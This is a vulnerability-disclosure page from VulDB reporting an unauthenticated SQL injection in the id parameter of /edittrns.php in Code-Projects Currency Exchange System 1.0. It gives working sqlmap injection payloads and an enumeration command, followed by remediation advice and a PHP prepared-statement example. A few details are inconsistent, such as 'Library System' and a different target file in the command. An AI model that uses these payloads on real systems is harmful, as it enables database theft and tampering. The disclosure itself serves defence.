Submit #701154: Code-Projects Currency Exchange System 1.0 /edittrns.php SQL Injection

Title: Code-Projects Currency Exchange System 1.0 /edittrns.php SQL Injection
Description:

# Vulnerability Report: Code-Projects Currency Exchange System V1.0 /edittrns.php SQL Injection

## Summary

| Detail | Content |
| :--- | :--- |
| **Affected Product Name** | Library System |
| **Affected Version** | V1.0 |
| **Vendor Homepage** | `https://code-projects.org/currency-exchange-system-in-php-with-source-code/` |
| **Vulnerability Type** | SQL Injection (SQLi) |
| **Affected File** | `/edittrns.php` |
| **Affected Parameter** | `id` (GET) |
| **Authentication Required** | None (No login or authorization required to exploit) |
| **Submitter** | yudeshui |

-----

## Description and Impact

### Root Cause

The vulnerability resides in the file `/edittrns.php`, where the application processes user-supplied input from the **`id`** (ID) parameter. The program **directly concatenates** this parameter value into the SQL query string **without sufficient cleaning, validation, or sanitization**.

### Impact

A successful attack allows an attacker to inject malicious SQL code, thereby manipulating the original database query logic. This can lead to severe consequences, including:

* **Unauthorized Database Access:** Stealing sensitive data such as user information or book records.
* **Data Tampering/Destruction:** Modifying, deleting, or adding records in the database.
* **System Control:** In severe cases, gaining system-level control, posing a serious threat to system security and business continuity.

-----

## Vulnerability Details and PoC

The vulnerability is located in the processing of the `id` parameter within a GET request.

### PoC Payload Examples

The following are examples of SQL injection payloads captured during testing with the `sqlmap` tool:

```
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 9314=9314 AND 'pVdP'='pVdP

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' OR (SELECT 3435 FROM(SELECT COUNT(*),CONCAT(0x71626b6271,(SELECT (ELT(3435=3435,1))),0x7171626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Xysl'='Xysl

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 3654 FROM (SELECT(SLEEP(5)))MqEA) AND 'eDDr'='eDDr

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x71626b6271,0x684d47676e51547943754f46574f7a6950474c6b6e444e4249497851714454656e5250764b42684e,0x7171626a71),NULL,NULL,NULL,NULL,NULL,NULL-- -
---
```

### Sqlmap Screenshot Example (Database Enumeration)

```
sqlmap -u "http://dede:802/viewserial.php?id=1" --batch --dbs
```

-----

![Image](https://github.com/user-attachments/assets/ff15d6f4-5f9c-4d4d-a988-7a6d6bae793a)

## Suggested Repair Measures

To completely resolve this SQL injection issue and enhance overall system security, the following defensive coding practices are strongly recommended:

### 1. Use Prepared Statements and Parameter Binding (Primary Defense)

This is the most effective method against SQL injection. Prepared statements separate the structure of the SQL command from the user-supplied data, ensuring the input is treated as a literal string value and cannot be interpreted as executable SQL code.

* **Action:** Rewrite all database queries in `/edittrns.php` (and all other files) to use **Prepared Statements** (e.g., using **`mysqli_prepare()`** or **PDO** with parameter binding).

### 2. Strict Input Validation and Filtering

Strictly validate and filter all user input data to ensure it conforms to the expected format, type, and length.

* **Action:** For parameters like `id` which should be numeric, use PHP functions like **`filter_var()`** or **`is_numeric()`** for strict checking.

### 3. Minimize Database User Permissions

Adhere to the Principle of Least Privilege. The database account used by the web application for daily operations should only possess the minimum necessary permissions.

* **Action:** Ensure the application's database user **does not** have administrative privileges (e.g., `DROP`, `ALTER`, or file system access) to limit the impact of a successful breach.

### 4. Regular Security Audits

Establish a routine process for security code reviews and auditing to proactively identify and fix potential vulnerabilities before they are exploited.
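The following PHP example is added here to show repair measures 1 to 3 together for the `id` parameter of `/edittrns.php`; it is not code from the Currency Exchange System project or from the submitter. The table name `transactions`, its columns `id`, `amount` and `currency`, the database name `currency_exchange`, the account `cx_app` and the `CX_DB_PASSWORD` environment variable are all assumptions made for the example. The unsafe function is included only to show the string-concatenation pattern the advisory describes next to its fixed counterpart.

```php
<?php
declare(strict_types=1);

// Added example, not the project's own code. Schema, database name, account name
// and the CX_DB_PASSWORD variable are assumptions.

// Make mysqli throw on errors so a failed prepare() cannot be silently ignored.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

/**
 * The pattern the advisory describes: the raw GET value is concatenated into the
 * query text, so a value such as 1' AND 9314=9314 AND 'pVdP'='pVdP is parsed as
 * SQL. Shown for comparison only; the handler below never calls it.
 */
function fetchTransactionUnsafe(mysqli $conn, string $rawId): ?array
{
    $sql = "SELECT id, amount, currency FROM transactions WHERE id = '" . $rawId . "'";
    return $conn->query($sql)->fetch_assoc() ?: null;
}

/**
 * Repair measure 2: strict validation. Returns a positive integer or null.
 * FILTER_VALIDATE_INT rejects "1'", "1 OR 1=1", "1.0", "" and null outright,
 * so the parameter can never reach the query as anything but an int.
 */
function validateId(mixed $raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/**
 * Repair measure 1: a prepared statement with the value bound as an integer.
 * The server parses the query text before the value is supplied, so the bound
 * value can only ever be data, never part of the SQL structure.
 */
function fetchTransaction(mysqli $conn, int $id): ?array
{
    $stmt = $conn->prepare('SELECT id, amount, currency FROM transactions WHERE id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Request handling for the GET parameter named in the advisory.
$id = validateId($_GET['id'] ?? null);
if ($id === null) {
    http_response_code(400);
    exit('Invalid transaction id');
}

// Repair measure 3: connect as an account that holds only the rights this page
// needs. Assumed grant, run once by a database administrator:
//   CREATE USER 'cx_app'@'localhost' IDENTIFIED BY '<strong password>';
//   GRANT SELECT, INSERT, UPDATE ON currency_exchange.transactions TO 'cx_app'@'localhost';
// No DROP, ALTER or FILE privilege, so a query-level compromise cannot alter the
// schema or read server files.
$conn = new mysqli('localhost', 'cx_app', getenv('CX_DB_PASSWORD') ?: '', 'currency_exchange');
$conn->set_charset('utf8mb4');

$row = fetchTransaction($conn, $id);
if ($row === null) {
    http_response_code(404);
    exit('Transaction not found');
}

header('Content-Type: application/json');
echo json_encode($row);
```

With this structure every sqlmap payload listed above fails at `validateId()` before a connection is even opened, and the prepared statement protects the query even if a future change passes a non-numeric value through, since `bind_param('i', ...)` sends the value separately from the SQL text.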
Source: https://github.com/rassec2/dbcve/issues/14
User: yudeshui (UID 91129)
Submission: 25.11.2025 13:52 (5 months ago)
Moderation: 07.12.2025 16:18 (12 days later)
Status: Accepted
VulDB Entry: 334659 [code-projects Currency Exchange System 1.0 /edittrns.php ID SQL Injection]
Points: 20
